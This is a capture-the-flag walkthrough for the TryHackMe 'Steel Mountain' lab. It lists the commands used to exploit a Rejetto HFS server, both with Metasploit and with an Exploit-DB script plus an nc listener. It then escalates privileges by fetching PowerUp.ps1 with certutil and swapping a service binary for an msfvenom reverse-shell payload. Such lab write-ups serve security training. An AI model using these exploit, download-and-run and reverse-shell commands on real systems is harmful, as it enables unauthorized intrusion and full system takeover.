Steel Mountain
Room Link: https://tryhackme.com/room/steelmountain
Walkthrough
Introduction
Who is the employee of the month?
Initial Access
Scan the machine with nmap. What is the other port running a web server on?
nmap -A 10.10.248.189
Take a look at the other web server. What file server is running?
Google this
What is the CVE number to exploit this file server?
Use Metasploit to get an initial shell. What is the user flag?
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set LHOST 10.10.62.157
set RHOSTS 10.10.181.159
set RPORT 8080
exploitOption #2 Without Metasploit to get an initial shell. What is the user flag?
Exploit Link: https://www.exploit-db.com/raw/39161
For this exploit we usually just need to change the ip_addr and local_port to our nc listener
Because I performed this on a tryhackme attacker box which has port 80 in user to login through web I had to change the exploit to get the nc.exe from us on a different port.
nc -nvlp 443
cp /usr/share/wordlists/SecLists/Web-Shells/FuzzDB/nc.exe .
python2 -m SimpleHTTPServer 81
python2 exploit.py 10.10.181.159 8080
Use Metasploit to get an initial shell. What is the user flag?
Privilege Escalation
Kali
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81Windows
certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks
Kali
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.228.214 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exeI couldn't delete the ASCService.exe but I could replace it when I copied the file over with certutil
Victim
cd C:\Program Files (x86)\IObit\Advanced SystemCare
sc stop AdvancedSystemCareService9
certutil -urlcache -f http://10.10.228.214:81/ASCService.exe ASCService.exeKali
nc -lvnp 4443Victim
sc start AdvancedSystemCareService9
Last updated